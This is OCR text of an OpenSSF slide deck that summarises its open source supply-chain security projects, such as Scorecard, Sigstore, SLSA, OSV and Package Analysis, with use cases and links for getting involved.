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Open Source Security 
Foundation 


Projects Overview 


Projects 


e Scorecard e Zar 

e GUAC e gittuf 

@ OQOpenVEX e OS\V Schema 

e Protobom e Package Analysis 

e bomctl e RSTUF 

e SBOMIt e Best Practices Badge 

e Sigstore e Criticality Score 

e SLSA e Fuzz Introspector 

@ S2C2F e Security Insights Specification 
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OPEN SOURCE SECURITY FOUNDATION 


OpenSSF Scorecard 


Quickly assess open source projects 
for risky practices. 


N 


OpenSSF Scorecard: Use Cases 


For individual maintainers 


e Helpful as a pre-launch security checker for a new project or to plan improvements to an existing 
one. 


For an organisation 
e Include in CI/CD processes using the GitHub action and run by default on pull requests. 
For consumers 


e Helps to make informed decisions about security risks and vulnerabilities. 
e Using the public data, evaluate the security posture of over 1 million of the most used OSS 
projects. 
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Automated Checks with Weighted Scoring 


e 18 checks for vulnerabilities affecting different 
parts of the software supply chain (shown right) 

e Each automated check returns a score out of 
10 and a risk level; some checks have staged 
scoring, others are dichotomous ener 

e The risk level adds weighting to the score eee see eyeNT | HoLtsTIc 
(shown below) PRACTICES 

e The weighted value of all checks are compiled 
into a single, aggregate score 


CODE 
VULNERABILITIES 


SOURCE 
RISK ASSESSMENT 


CRITICAL RISK 10 


HIGH RISK 7/ Ae) 


MEDIUM RISK 5 


LOW RISK 2.5 https://github.com/ossf/scorecard#scorecard-checks 
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OpenSSF Scorecard: Running the Checks 


e Run automatically on code you own using the GitHub Action 
o Authenticate repo access with Personal Access Token 
o Install Scorecard action to your code scanning suite 
o Can publish results and display Scorecard badge on GitHub repo 


e Run manually on your (or somebody else’s) project via the Command Line 
o Check someone else’s repository 
o Select which checks you want to run 
o Control how detailed your results are 


OpenSSF Scorecard: Viewing Scores 


e Use the webviewer to see score reports for projects regularly 
scanned by Scorecard (shown right, link below) 
o https://securityscorecards.dev/viewer/?uri=<github_or_g 
itlab>.com/ <user_name_or_org>/<repository_name> ig 
o Results can be sorted by check name, score, or risk 
level 


e Use the REST API to query pre-calculated scores of OSS —= 
projects P10 


e Use the Scorecard CLI to view scores for projects that are © 

not regularly scanned by Scorecard 

e OpenSSF Scorecard scans 17 million of the most critical OSS 

projects 10 
o Results published in a BigQuery public dataset ° 
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4 OpenSSF Scorecard Report 


@ github.com/ossf/scorecard 


COMMIT: f8198b06215375679bede72614179529a19202FF 
GENERATED AT: 2023-11-27T18:10:52Z 


Dangerous-Workflow 


Determines if the project's GitHub Action workflows avoid dangerous patterns 


Signed-Releases 


Determines if the project cryptographically signs release artifacts. 


Vulnerabilities 


Determines if the project has open, known unfixed vulnerabilities. 


Binary-Artifacts 


Determines if the project has generated executable (binary) artifacts in the source repository. 


Code-Review 


Determines if the project requires human code revi 


Dependency-Update-Tool 


Determines if the project uses a dependency update tool 


Maintained 


Determines if the project is "actively maintained" 


Token-Permissions 


82 on 
a ksh 


iew before pull requests (aka merge requests) are merge: 


OpenSSF Scorecard: Sub-projects 


e Scorecard API Visualizer. Fetches the scorecard 
data from the OpenSSF Scorecard API and 
presents it in a user-friendly and interactive 
visual format 

e Scorecard Monitor: Simplifies score tracking in 
organizations with automated markdown, JSON 
reports, and optional GitHub issue alerts 

e Allstar. GitHub App that continuously monitors 
GitHub organizations or repositories for 
adherence to security best practices. 


OpenSSF Scorecard: Get Involved 


Website: https://scorecard.dev 


GitHub: https://github.com/ossf/scorecard 
Slack: #scorecard 


Working Group: Best Practices 
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Graph for Understanding 
Artifact Composition 


GUAC gives you directed, actionable insights into the 
security of your software supply chain. 


GUAC 


GUAC: Use Cases 


For developers 


Identify deprecated and unsupported dependencies 

Discover “version sprawl", where several versions of the same dependency are included 
Locate and remediate vulnerable dependencies 

Identify risky upstreams based on security practices evaluated by OpenSSF Scorecard 


For operations engineers 
e Locate and remediate vulnerable dependencies 
For open source program offices 


e Identify strategically important open source upstreams 
e Identify open source upstreams that could benefit from security help based on OpenSSF Scorecard results 
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GUAC: Mapping the relationships between software 


GUAC aims to fill in the gaps by a... 

. ‘ : *~ a 
ingesting software metadata, like Birnaccrnar ation 
SBOMs, and mapping out Day, 

F ‘i Gi kube-schedulatv4.252 “iy , nn 
relationships between software. rs aed eran 
When you know how one piece of NG bomen Sabre. 

Rca. = a Se 
software affects another, you'll Panes? Some 
be able to fully understand your Fimmenaieess =. a 
software security position and i Ai 
act as needed. ". 
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deps.dev 


Improving Your Software 
Security Posture 


VEX 


In-toto Attestations 


OpenSSF 


Insights for Policy Checks, Patch 


Planning, Identifying Critical Infrastructure 


(© CycloneDx 
TZ SPDx 


GUAC API enables you to: 


rigor tN Input data sources used by your organization 

Unveil gaps in the software supply chain data using other data sources 
Establish connections between your software catalog 
Identify threats in your supply chain and provide a path to remediation 


OSV 


Threat Intelligence 
Vulnerability Information 


© 2024 The GUAC Authors. All rights reserved.. 
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GUAC: Components 


The full GUAC component deployment is a set of 
asynchronous services that combine to forma 
robust and scaleable pipeline. 


e GraphQL Server: abstraction layer for 
integrations and other components 
e Ingestion Pipeline: 
o Collector: Reads or watches locations for new 
documents and collects them when found 
o  Ingestor: Parses docs (ex: SBOMs) into GUAC 
data model/ontology 
o Assembler: Puts GUAC objects into queryable 
datastore 
o _CollectSub: Takes identifiers of interest and 
creates a subscription for collectors to follow 


é OpenSSF 


Your tool here! 


graphQL client 


IDE Plugins, 
Cl checks 
Policy Engines... 


Assemble 


CollectSub 
Data 
Subscriptions 


Open Source Insights 
@ deps.dev 
Open S 
OSV | Heese. re 


Organization Software 


[2 sppx 


(© CycloneDX 
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GUAC: Get Involved 


Website: https://guac.sh/ 
GitHub: https://github.com/ossf/scorecard 
Slack: #guac 


Working Group: Supply Chain Integrity 


GUAC 
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OpenVEX 


A simplified Vulnerability Exploitability 
eXchange implementation 


N 


OpenVEX: Use Cases 


The primary use cases for VEX are to provide users (e.g., operators, developers, and 
services providers) additional information on whether a product is impacted by a 
specific vulnerability in an included component and, if affected, whether there are 
actions recommended to remediate. 
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The VEX Statement 


VEX centers on the notion of a statement. In short, a statement can be defined as an 
assertion intersecting product, a vulnerability, and an impact status: 


statement = product(s) + vulnerability + status 
L The software product | Typically a CVE related L One of the impact 
we are talking about to one of the product's statuses as identified 
components by the VEX working group. 
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OpenVEX Is... 


A Specification 

OpenVEX documents are minimal JSON-LD files that capture the minimal requirements for VEX as defined by 
the VEX working group organized by CISA. The OpenVEX Specification is owned and steered by the community. 
A Go Library 

The project has a go library (openvex/go-vex) that lets projects generate, transform and consume OpenVEX files. 


It enables the ingestion of VEX metadata expressed in other VEX implementations. 


A Set of Tools 


Work is underway to create the tools software authors and consumers need to handle VEX metadata. The 
current flagship project is vexctl, a CLI to create, merge and attest VEX documents. 


OpenVEX: Ecosystem 


The project has a growing ecosystem with known implementations in: 


e Go (original): https://github.com/openvex/go-vex 
e .NET: NuGet GitHub 


e Rust: https://docs.rs/openvex/latest/openvex/ 
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OpenVEx: Get Involved 


e GitHub: https://github.com/openvex 


e Slack: #sig-openvex 
e Special Interest Group: OpenVEX 
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Protobom 


A format-neutral SBOM data 
representation and I/O library 


= 
eS 
JS 
SS To vy 


Protobom 


Protocol buffers representation of SBOM data 
Able to ingest documents in modern SPDX and CycloneDX versions without loss 
Accompanying Go library generated from the protocol buffers definition that also 
implements ingesters for those formats 

e Standard SBOMSs read by a reader using parsers that understand the common 
formats. 

e Parsers create neutral protobom from data read from CycloneDX or SPDX 
documents 

e Can be rendered into standard SBOM formats by the writer using serializers 
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Protobom: Usage 


The protobom library can be used to read in and write out SBOM documents in these formats: 


Format Version Encoding Read Write 
SPDX 22 JSON planned - 
SPDX 22 tag-value —_ planned - 
SPDX 23 JSON supported supported 
SPDX 23 tag-value —_ planned - 
SPDX 3.0 JSON planned planned 
CycloneDX 1.4 JSON supported supported 
CycloneDX = 1.5 JSON supported supported 


OpenSs 
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Protobom: Examples 


e Thesbom-convert project 
o https://github.com/protobom/sbom-convert provides a complete example of using the library to 
ingest an SBOM into the protobom intermediate format and then write out anew SBOM document 
in a different format. 
e Read in SBOM document to work with specific field(s) 
o The protobom library is the best and easiest way to interact with SBOM documents using the Go 
programming language. 
e Generate an SBOM document programmatically 
o The protobom intermediate representation could also be used to create a new SBOM document. 
Developers could create a new protobom document and use the Go programming language to 
populate the fields needed in the SBOM document. 


@ OpenSSF 


Protobom: Get Involved 


e GitHub: https://github.com/protobom/protobom 
e Slack: #protobom 
e Working Group: Security Tooling 


» 

é@ OpenSSF 
| 

boa * » OPEN SOURCE SECURITY FOUNDATION 


é OpenSSF 
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SBOMIt 


Specification of an SBOM format independent () 
method for attesting components 
wa 


SBOMit 


An SBOMit document is effectively an SBOM, only with 
additional verification information added that was generated 
at the time the supply chain was generated. This verification 
information, which uses in-toto attestations and layouts, can 
be validated by a party to get a high degree of assurances 
about the software. 
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SBOMit: Document Components 


e Aseries of in-toto attestations that were generated as 
the described software was created 
o Detailed information about steps of the software supply chain 
e Anin-toto layout signed by the project owner 
o Describes what valid attestation metadata for the project looks like 
e Supplemental SBOM information 


o Along with the in-toto attestations and in-toto layout can be used 
to derive an actual SBOM in a variety of formats 


SBOMit: Advantages 


e Generated at the time the software is being processed 
through the software supply chain 


o More accurate than scanning tools that use incomplete information 
to try to recover what happened in the past 


e Contains cryptographically signed metadata about all of 
the steps that went into making the software 


o Much harder for accidental inaccuracies like skipping a step or for 
malicious actions to be undetected 


e Provides greater ability to securely recover froma 
compromise 


SBOMit: Get Involved 


e GitHub: https://github.com/sbomit 
e Slack: #sbomit 


e Working Group: Security Tooling 


Sigstore 


A wax seal of security for the digital era. 


Sigstore: Vision 


Sigstore was started to improve supply chain technology 
for anyone using open source projects. It's for open 
source maintainers, by open source maintainers. 


And it's a direct response to today’s challenges, a work in 
progress for a future where the integrity of what we build 
and use is up to standard. 


P=.) 
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Sigstore: How it Works 


Sigstore is a set of tools developers, software 
maintainers, package managers and security experts 
can benefit from. Bringing together free-to-use open 
source technologies like Fulcio, Cosign and Rekor, it 
handles digital signing, verification and checks for 
provenance needed to make it safer to distribute and 
use open source software. 


SIGN AND 
PUBLISH 
ARTIFACTS 


PUBLISH 
SIGNING 
CERTIFICATES 


MONITOR 
LOGS 


A standardized approach 


KEY 
TRANSPARENCY 
LOG 


. FULCIO SIGNATURE 
This means that open source software uploaded for CERTIFICATE TRANSPARENCY 


distribution has a stricter, more standardized way of ie ae 
checking who's been involved, that it hasn't been 
tampered with. There’s no risk of key compromise, so 
third parties can’t hijack a release and slip in something 
malicious. 


TRUST ROOT 
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Sigstore: Components 


e Cosign: User-friendly tool to sign and verify software artifacts and container images. 
e Fulcio: Certificate authority to issue short-lived identity-based code-signing certificates. 


e Rekor: Transparency log providing a tamper-resistant record of software signatures and 
metadata. 


e = Gitsign: Sign Git commits with your own GitHub / OIDC identity. 


eo 8s 9 


sigstore sigstore sigstore sigstore 


fulcio cosign rekor gitsign 
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Sigstore: Benefits 


Previous tools to cryptographically sign OSS packages often unused 
o No widely-practical mechanism to determine if public keys used are correct — verification impractical 
o No easy way to detect malicious signing 
o Key revocation typically impractical in practice 
Sigstore is a free-to-use non-profit software signing service 
o Users generate ephemeral short-lived key pairs using the sigstore client tooling 
sigstore PKI service provides a signing certificate generated upon a successful OpenID connect grant 
All certificates are recorded in certificate transparency log 
Software signing materials are sent to a signature transparency log 
Guarantees that claimed user controlled their identity service providers’ account at time of signing 
Once the signing operation is complete, the keys can be discarded, removing any need for further key 
management or need to revoke or rotate. 
Using OpenID connect identities enables use of existing security controls such as 2FA, OTP and 
hardware token generators 
Enables using cloud ClI/CD provider without maintaining private key - simple! 
Transparency logs are public and open; anyone can monitor transparency logs for issues 


Oo OO © oO 
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Sigstore: Get Involved 


Website: https://www.sigstore.dev/ 
GitHub: https://github.com/sigstore/ 


Slack: sigstore.slack.com 
Training: LFS182 
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Supply-chain Levels for 
Software Artifacts (SLSA) 


Safeguarding artifact integrity 
across any software supply chain 


N 


SLSA 


Supply-chain Levels for Software Artifacts, or SLSA ("salsa"). 


It's a security framework, a checklist of standards and controls 
to prevent tampering, improve integrity, and secure packages 
and infrastructure. It’s how you get from "safe enough" to 
being as resilient as possible, at any link in the chain. 


If an SBOM is like a list of ingredients, SLSA is like all of the 
food safety handling guidelines that make an ingredient list 
credible. 
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SLSA: Use Cases 


SLSA is for everyone involved in producing, consuming, and providing infrastructure for 
software such as build platforms and package ecosystems. 


Producers: for protection against tampering and insider threats 
Consumers: to verify the software they rely on is secure 

Infrastructure Providers: as a guideline for hardening build platforms and 
processes. 
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SLSA: The Supply Chain Problem 


Any software can introduce 
vulnerabilities into a supply chain. As 
a system gets more complex, it's 
critical to already have checks and 
best practices in place to guarantee 
artifact integrity, that the source code 
you're relying on is the code you're 
actually using. Without solid 
foundations and a plan for the system 
as it grows, it's difficult to focus your 
efforts against tomorrow's next hack, 
breach or compromise. 


é OpenSSF 


SOURCE THREATS BUILD THREATS 
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DEPENDENCY THREATS 
SOURCE THREATS DEPENDENCY THREATS BUILD THREATS 
A Submit unauthorized change D Use compromised dependency & Compromise build process 
B Compromise source repo F Upload modified package 
C Build from modified source G Compromise package registry 


H Use compromised package 
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SLSA offers... 


e Acommon vocabulary to talk about software supply 
chain security 

e Away to secure your incoming supply chain by evaluating 
the trustworthiness of the artifacts you consume 

e Anactionable checklist to improve your own software's 
security 

e Away to measure your efforts toward compliance with 
forthcoming Executive Order standards in the Secure 


Software Development Framework (SSDF) 
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SLSA: Levels of Assurance 


e Common language for security of software, supply chains and their components 
e Industry-recognized best practices to create four compliance levels of increasing assurance 
e Levels look at the builds, sources and dependencies in open source or commercial software 


Level Requirements Focus 
BuildL1 Provenance showing how the package was built Mistakes, documentation 
BuildL2 Signed provenance, generated by a hosted build Tampering after the build 
platform 
BuildL3 Hardened build platform Tampering during the build 
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SLSA: Get Involved 


Website: https://slsa.dev/ 
GitHub: https://github.com/slsa-framework/slsa 
Slack: #slsa 


Working Group: Supply Chain Integrity 
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Zart 


A free open source tool that enables continuous software 
delivery on systems that are disconnected from the 
internet. 


DevSecOps for Airgap 


Zarf eliminates the complexity of air gap 
software delivery for Kubernetes clusters and 


cloud-native workloads using a declarative 
packaging strategy to support DevSecOps in 
offline and semi-connected environments. 


Modern software assumes your systems have 
access to the internet. This may work for 99% of 
the world, but certain SECURE systems need to 
maintain capabilities while being disconnected 
or intermittently disconnected from the internet. 
Zarf keeps your software running, no matter 
your connection status. 
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Zarf: Use Cases 


e Intermittently Connected Systems 
A o Some systems experience disconnection occasionally due to temporary 
& loss of access, like a rocket going around the moon. Zarf keeps those 
systems running. 
e Always Disconnected 
(ece o Other systems are always disconnected due to lack of internet access. 
Maybe they are underground, underwater, or on another planet. 
7 e Situationally Disconnected Systems 
Se o The worlds most important infrastructure needs to be able to control 
ve their connection to the internet and still run in the case of internet loss or 
a cyber attack. 
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Zarf: Use it to... 


e Securely Package Apps & Resources 
o Package a chunk of the internet and securely deliver all of the files and dependencies 
needed to run an application in a disconnected environment. 
e Deploy Cloud Apps While Disconnected 
o Deploy apps declaratively and without internet connectivity. This opens the door for 
modern cloud capabilities to be deployed in disconnected environments. 
e Easily Maintain Apps While Disconnected 
o Reduces the skills and resources needed to manage and update applications in 
disconnected environments, ensuring no downtime or data loss when updating 
software. 
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Zarf: Features 


Automate Kubernetes deployments in disconnected environments 


Automate Software Bill of Materials (SBOM) generation 


Build and publish packages as OCI image artifacts 
Provide a web dashboard for viewing SBOM output 


Create and verify package signatures with cosign 

Publish, pull, and deploy packages from an OCI registry 

Powerful component lifecycle actions 

Deploy a new cluster while fully disconnected with K3s or into any existing cluster using a kube config 
Built-in Git server with Gitea 

Built-in Docker registry 

Builtin K9s Dashboard for managing a cluster from the terminal 

Mutating Webhook to automatically update Kubernetes pod's image path and pull secrets as well as Flux Git 
Repository URLs and secret references 

Builtin command to find images and resources from a Helm chart 

e Tunneling capability to connect to Kubernetes resources without network routing, DNS, TLS or Ingress configuration 
required 
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Zarf: Get Involved 


e Website: https://zarf.dev/ 


e GitHub: https://github.com/zarf-dev/zarf 
e Slack: #zarf 
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gittuf 


A security layer for Git using concepts 
introduced by The Update Framework (TUF) 


N 


sittuf 


gittuf provides a security layer for Git using some concepts 
introduced by The Update Framework (TUF). Among other 
features, gittuf handles key management for all developers 
on the repository, allows you to set permissions for 
repository branches, tags, files, etc., protects against other 
attacks Git is vulnerable to, and more — all while being 
backwards compatible with GitHub, GitLab, etc. 


gittuf is a sandbox project at OpenSSF as part of the Supply 
Chain Integrity Working Group. 
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sittuf: Features 


e Root of Trust 
Oo gittuf uses TUF semantics to establish a root of trust for a Git repository 
e Key Distribution and Revocation 
o  gittuf allows repository owners to declare and distribute the public keys required to verify Git 
commit and tag signatures 
e Permissions 
o  gittuf builds on the improved key distribution and revocation mechanisms by leveraging Git's 
commit and tag signing to define access control policies 
o Repository owners can define rules such as the set of developers authorized to make changes toa 
branch or create a tag 
o Repository owners can also create policies that dictate which users can make changes to specific 
files in the repository 
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sittuf: Goals 


While developing gittuf, we have the following goals. 
Unopinionated / Agnostic 


gittuf provides features to implement different policies without requiring the use of specific systems 
or tools. For example, gittuf supports a variety of signing mechanisms such as GPG keys and Sigstore's 
gitsign. 


Compatible 


gittuf is designed with great care to be compatible with standard Git repositories. All additional 
artifacts are stored in Git's object store in a gittuf-specific namespace. These artifacts are not visible in 
the “main” contents of a repository, and therefore do not create any clutter. 
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sittuf: Get Involved 


Website: https://gittuf.dev/ 
GitHub: https://github.com/gittuf/gittuf 
Slack: #gittuf 


Working Group: Supply Chain Integrity 
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Open Source 
Vulnerability Schema 
(OSV Schema) 


Better vulnerability triage 
for open source 
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OSV Schema 


OSV Schema defines a standard interchange format for 
describing vulnerabilities in open source packages. 


We hope to define a simple format that all vulnerability 
databases can export, to make it easier for users, security 
researchers, and any other efforts to consume all available 
databases. Use of this format would also make it easier for 
the databases themselves to share or cross-check 
information. Ultimately, this format aims to enable 
automated, accurate, and distributed management of 
vulnerabilities in open source dependencies. 


pensor 


“schema_version": string, 
“id": strin 
“modified": string, 
“published”: string, 
“withdrawn”: string, 
“aliases": [ string ], 
“related": [ string ], 
“summary": string, 
“details": string, 
“severity”: [ { 
“type”: string, 
“score”: string 


+1, 
“affected”: [ { 
“package”: { 
“ecosystem": string, 
“name": string, 
“purl": string 


’ 

“severity”: [ { 
“type": string, 
“score”: string 


, 
"ranges": [ { 
“type”: string, 
“repo": string, 
“events": [ { 
“introduced": string, 
"fixed": string, 
“last_affected": string, 
“Limit": string 
1, 
“database_specific": { see description } 
#1, 
“versions”: [ string ], 
“ecosystem_specific": { see description }, 
“database_specific": { see description } 


, 

“references”: [ { 
“type”: string, 
“url: string 


1, 
“credits": [ { 
"name": string, 


“contact": [ string ], 
"type": string 


, 
“database_specific": { see description } 
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OSV: Use Cases 


e Open source consumers: By querying OSV.dev’s API and using the tooling to find 
known vulnerabilities in their dependencies. 

e Vulnerability database producers: By making the database available in the OSV 
format. 


Open Source 
Vulnerabilities 


OSV 
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OSV consists of: 


1. The OSV Schema: An easy-to-use data format that maps precisely to open source 
versioning schemes. 


2. Reference infrastructure (OSV.dev website, API, and tooling) that aggregates, 
enriches and indexes vulnerability data from databases that use the OSV schema. 
3. QS\-Scanner, the officially supported frontend for OSV.dev 


OSV 
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Open Source 
Vulnerabilities 


OSV: How it Works 


OSV enables developers to identify known third-party open 
source dependency vulnerabilities that pose genuine risk to 
their application and its environment, so they can focus 
remediation efforts on the vulnerabilities that matter and 
sustainably manage vulnerabilities that do not affect them. 


The OSV repository contains the infrastructure code that 
serves osv.dev (including the API). This infrastructure serves 
as an aggregator of vulnerability databases that have 
adopted the OpenSSF Vulnerability format. 


osv.dev additionally provides infrastructure to ensure 
affected versions are accurately represented in each 
vulnerability entry, through bisection and version analysis. 
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Aggregate vulnerability data 
from sources using 
https://ossf.github.io/osv-schema 


Query for known 
vulnerabilities 


~ OSV.dev 


by version 
number/ commit 
hash 


2. Compute precise affected 
commit ranges, versions 
affected 


j Optional bisect 
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package 
repository 
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source 
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OSV Schema: Get Involved 


Website: https://ossf.github.io/osv-schema/ 
GitHub: https://github.com/ossf/osv-schema 
Slack: Hosv_ schema 


Working Group: Vulnerability Disclosures 
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Package Analysis 
Improving the security of open 


source software by detecting 
malicious behavior 
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Package Analysis 


The project looks for behaviors in packages available on open source repositories that 
indicate malicious software: 


e What files do they access? 
e What addresses do they connect to? 
e What commands do they run? 


The project also tracks changes in how packages behave over time, to identify when 
previously safe software begins acting suspiciously. 


This effort is meant to improve the security of open source software by detecting 
malicious behavior, informing consumers selecting packages, and providing 
researchers with data about the ecosystem. 
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Package Analysis: How it Works 


The project's components are: 
e Ascheduler - creates jobs for the analysis worker from Package Feeds. 
e Analysis (one-shot analyze and worker) - collects package behavior data through 
static and dynamic analysis of each package. 
e A loader - pushes the analysis results into BigQuery. 


The goal is for all of these components to work together and provide extensible, 
community-run infrastructure to study behavior of open source packages and to look 
for malicious software. We also hope that the components can be used independently, 
to provide package feeds or runtime behavior data for anyone interested. 
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Package Analysis: Pipeline 


Cloud 


j Storage 


1. Package repositories are monitored for new packages. 

2. Each new package is scheduled to be analyzed by a pool of workers. 
3. Aworker performs dynamic analysis of the package inside a sandbox. 
4. Results are stored and imported into BigQuery for inspection. 


This data is available in the public BigQuery dataset. 


Package Analysis: Sub-projects 


° ieee Feeds https://github.com/ossf/package-feeds 


oO 


The binary produced by cmd/scheduled-feed/main.go can be used to monitor various package 
repositories for changes and publish data to external services for further processing. 

Feeds to watch package registries (PyPI, NPM, etc.) for changes to packages and to make that data 
available via a single standard interface. 

Publisher provides the functionality to push package details from feeds towards external services 
such as GCP Pub/Sub. Package details are formatted inline with a versioned json-schema. 


© alee Packages https://github.com/ossf/malicious-packages 


A collection of reports of malicious packages identified in Open Source package repositories, 
consumable via the Open Source Vulnerability (OSV) format. 

The aim of this project and repository is to be a comprehensive, high quality, open source database 
of reports of malicious packages published on open source package repositories. 

These public reports help protect the open source community, and provide a data source for the 
security community to improve their ability to find and detect new open source malware. 
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Package Analysis: Get Involved 


e GitHub: https://github.com/ossf/package-analysis 
e Slack: #package-analysis 
e Working Group: Securing Critical Projects 
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Repository Service 
for TUF (RSTUF) 


Better vulnerability triage for open source 


N 


RSTUF 


Repository Service for TUF (RSTUF) is a collection of 
components that provide services for securing content 
downloads from tampering between the repository and the 
client (for example, by an on-path attacker). 


RSTUF security properties are achieved by implementing 
The Update Framework (TUF) as a service. 


Repository Service for TUF is platform, artifact, language, 
and process-flow agnostic. 
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RSTUF: Use Cases 


Some RSTUF use case examples include but are not limited to: 


An organization has a live “Software Updater". This “Software Updater” uses TUF to 
download, install and update software artifacts. 

An organization distributes documents. The reader uses TUF to fetch documents 
submitted by a trusted source. 

An organization owns a private container image registry and uses TUF in the CI/CD to 
deploy computing trusted images at the edge. 

An organization with many Operational Technology (OT) devices in different plants uses 
TUF clients to fetch firmware, software, and projects from a distributed artifact 
repository. 

Web portal, which uses TUF to list all artifacts from a content repository and render asa 
Web UI, the user to download using a web browser. 
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RSTUF: Design/Solution 


e Simplifies the adoption of TUF by removing the need to 
design a repository integration — RSTUF encapsulates 
that design. 

e Designed to be integrated with existing content delivery 
solutions — at the edge or in public/private clouds — 
alongside current artifact production systems, such as 
build systems. 

e Protects downloading, installing, and updating content 
from arbitrary content repositories. 
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RSTUF: API Integrations 


If a user wants to integrate RSTUF into an existing CI/CD pipeline the only requirement is to make a REST API 
request to RSTUF: 


:Build Systems 


= 
= 


rl 


Public Reposito! 


é OpenSSF 
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RSTUF: Get Involved 


Website: https://repository-service-tuf.readthedocs.io/ 
GitHub: https://github.com/repository-service-tuf 


Slack: #repository-service-for-tuf 
Working Group: Securing Software Repositories 
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secure Supply Chain " 
Consumption Framework (S2C2F) 


The S2C2F guide outlines and defines how to securely 
consume OSS dependencies into the developer's 
workflow. 


N 


S2C2F 


The S2C2F is a combination of processes and tools for 
any organization to adopt to help establish a secure OSS 
ingestion process to protect developers from OSS Supply 
Chain threats and to help establish a governance 
program to manage your organization's use of OSS. 
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S2C2F: Objective 


The objective for the S2C2F Project is to develop and 
continuously improve upon a guide that provides the 


following: 

e Ahigh-level solution-agnostic set of practices 

e Adetailed list of requirements 

e Alist of real-world supply chain threats specific to OSS, 
and how our Framework requirements mitigates them 

e Amaturity model-based implementation guide, with 
links to tools from across the industry 

e Aprocess for assessing your organization's maturity 

e Amapping of the Framework requirements to 6 other 


supply chain specifications 
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S2C2F: Core Concepts 


The S2C2F is modeled after three core concepts—control all artifact inputs, continuous process 
improvement, and scale. 


core goals of the 
concepts framework 


Continuous & 4 
process : 
improvment Your org a 


Control all 
artifact inputs 
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S2C2F: Get Involved 


e GitHub: https://github.com/ossf/s2c2f 
e Slack: #s2c2f 


e Working Group: Supply Chain Integrity 
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Best Practices 
Badge Program 


Best practices for Free/Libre and 
Open Source Software 


N 


Best Practices Badge Program 


The Best Practices badge is a way for Free/Libre and 
Open Source Software (FLOSS) projects to show that 
they follow best practices. Projects can voluntarily 
self-certify, at no cost, by using a web application to 
explain how they follow each best practice. The 
OpenSSF Best Practices Badge is inspired by the many 
badges available to projects on GitHub. Consumers of 
the badge can quickly assess which FLOSS projects are 
following best practices and as a result are more likely 
to produce higher-quality secure software. 
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Best Practices Badge Program 


The OpenSSF Best Practices Badge website outlines the 
criteria for the passing badge, provides an example, 


shows participating projects, and supports queries to 
show projects that have a passing badge. This project 
was formerly known as the Core Infrastructure Initiative 
(Cll) Best Practices Badge and was formally renamed as 
part of OpenSSF in late 2021. More information on the 
OpenSSF Best Practices Badging program is available on 
GitHub. 
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Best Practices Badge Program 


Getting a passing badge is a significant achievement; on average only about 10% penssf best practices 
of pursuing projects have a passing badge. We have established two higher 
levels beyond passing: silver and gold. Here is asummary of the gold criteria: 


est practices Elvi: 


At least 2 unassociated significant contributors 

Per-file copyright and license 

Use 2FA 

At least 50% of all modifications are reviewed by another 
Have a reproducible build 

Use continuous integration 

Statement coverage 90%+ 

Branch coverage 80%+ 

Support secure protocols & disable insecure protocols by default 
Use TLS version 1.2 or higher 

Have a hardened project website, repo, and download site 
Have a security review (internal or external) 
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Best Practices Badge Program: Get Involved 


Website: https://www.bestpractices.dev 
GitHub: https://github.com/coreinfrastructure/best-practices-badge 


Slack: #wg-best-practices-ossdev 
Working Group: Best Practices for Open Source Developers 


=o 
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Criticality Score 


Defining the influence and 
importance of a project 
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Criticality Score 


The Criticality Score gives criticality score for an open source project. 
Goals: 


e Generate a criticality score for every open source project. 
e Create a list of critical projects that the open source community depends on. 
e Use this data to proactively improve the security posture of these critical projects. 


A project's criticality score defines the influence and importance of a project. It is a number between O 
(least-critical) and 1 (most-critical). It is based on the following algorithm by Rob Pike: 


zis va log(1 +5) 


C i log(1 + max(S;, T;)) 


project = - 
2 
I 
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Criticality Score: Get Involved 


e GitHub: https://github.com/ossf/criticality score 
e Working Group: Securing Critical Projects 
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Improving the fuzzing 
experience of a project —— 
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Fuzz Introspector 


Fuzz introspector is a tool to help fuzzer developers to get an understanding of their 
fuzzer's performance and identify any potential blockers. Fuzz introspector aggregates 
the fuzzers’ functional data like coverage, hit frequency, entry points, etc to give the 
developer a birds eye view of their fuzzer. This helps with identifying fuzz bottlenecks 
and blockers and eventually helps in developing better fuzzers. 


Fuzz-introspector aims to improve fuzzing experience of a project by guiding on 
whether you should: 


e introduce new fuzzers to a fuzz harness 
e modify existing fuzzers to improve the quality of your harness. 
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Indexing OSS-Fuzz Projects 


Open Source Fuzzing Introspection provides introspection capabilities to OSS-Fuzz 
projects and is powered by Fuzz Introspector. 


e Table of projects with Fuzz Introspector analysis 


e Examples, with links in profile to latest Fuzz Introspector analysis: 
o Liblouis /C 
o htslib/C 
oO brotli/ C++ 
o idna/ python 
Oo junrar/java 
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Fuzz Introspector: Architecture 


Compilation-based 
" ; i Reports for 
Fuzzing harness Static analysis Post-processing 


each driver 


Compiler-based analysis by way of LLVM 
using link time optimisation (LTO): Data processin 
Fuzzer 1 Source;codeland - Control-flow graph extraction F a html report 
[ Fuzzer 1 || Stucecowe a | : 


- Data about each function in module 


build.sh for each driver 


{ 


Core analyses SCO s<himi> 


is Dynamic analysis ——ee 
= 


Fuzzer 2 


c 


Coverage reports 


-cpp 


Fuzzer 3 
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Fuzz Introspector: Get Involved 


e GitHub: https://github.com/ossf/fuzz-introspector 
e Working Group: Security Tooling 
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Security Insights 
Specification 


Machine-processable project 
security information reporting 
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Security Insights Specification 


This specification provides a mechanism for projects to report information about their 
security in a machine-processable way. It is formatted as a YAML file to make it easy to 
read and edit by humans. 


The data tracked within this specification is intended to fill the gaps between simplified 
solutions such as SECURITY.md and comprehensive automatable solutions such as 
SBOMs. In that gap lay elements that must be self-reported by projects to allow 
end-users to make informed security decisions. 


As the adoption of Security Insights grows, so does the opportunity to automatically 
ingest it. For example, the Linux Foundation's CLOMonitor parses a project's Security 
Insights file to determine whether projects have reported on select security factors 
prioritized by the foundation. 
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Security Insights Specification: Get Involved 


e GitHub: https://github.com/ossf/security-insights-spec 
e Slack: #security-insights 
e Working Group: Identifying Security Threats in Open Source Projects 
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bomctl 


Bridging the gap between SBOM generation 
and SBOM analysis tools. 
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bomctl 


bomctl is format-agnostic Software Bill of Materials 
(SBOM) tooling, which is intended to bridge the gap 
between SBOM generation and SBOM analysis tools. It 
focuses on supporting more complex SBOM operations 
by being opinionated on only supporting the NTIA 
minimum fields or other fields supported by protobom. 


It is intended to help developers who need to manipulate 
SBOMs at the CLI or within a workflow. Example 
operations would be merging in project specific SBOM 
data that would not be detected by a SBOM generation 
tool. 
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bomctl: Goals 


e Simplify the process of manipulate SBOM Files 
while being SBOM format agnostic 

e Simplify linking SBOM Files to allow "trees" of 
SBOM Files to handle capturing systems of systems 

e Manage reading SBOM Files from a variety of 
sources 

